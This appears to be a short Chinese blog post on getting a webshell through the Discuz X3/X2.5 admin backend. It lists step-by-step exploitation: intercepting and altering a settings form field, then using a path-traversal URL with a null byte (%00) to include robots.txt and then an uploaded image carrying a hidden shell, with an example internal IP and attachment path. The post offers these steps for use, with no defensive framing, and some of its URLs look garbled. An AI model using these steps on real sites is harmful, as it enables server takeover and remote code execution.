[漏洞]discuz x3/x2.5 最新后台getshell详细利用方法
逛来逛去发现了discuz后台getshell的最新漏洞,介分享出来。
用户 – 用户栏目 – 栏目分组 – 提交 – 抓包
Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"
改为:
Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"
访问
/home.php?mod=spacecpid=../../robots.txt%0057
利用:
1.首先进后台,抓个包
2.改包
将
Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"
改为
Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"
提交
3.提交过后访问
/home.php?mod=spacecpid=../../robots.txt%00
4.找个地方上传图片马
5.访问图片马
http://192.168.2.190//home.php?mod=spacecp
id=../../data/attachment/forum/201305/24/122111m1464cdtfkc0stt1.gif%00
标签: none